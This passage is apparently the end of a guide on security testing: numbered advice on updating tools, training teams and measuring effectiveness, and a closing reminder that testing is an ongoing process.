  3. Regularly Update Your Toolkit with new tools and techniques
  4. Train Your Team on advanced security testing methods
  5. Establish Metrics to measure security testing effectiveness

Remember: Security testing is an ongoing process, not a one-time event. Regular assessments, combined with proper remediation and monitoring, create a robust security posture.

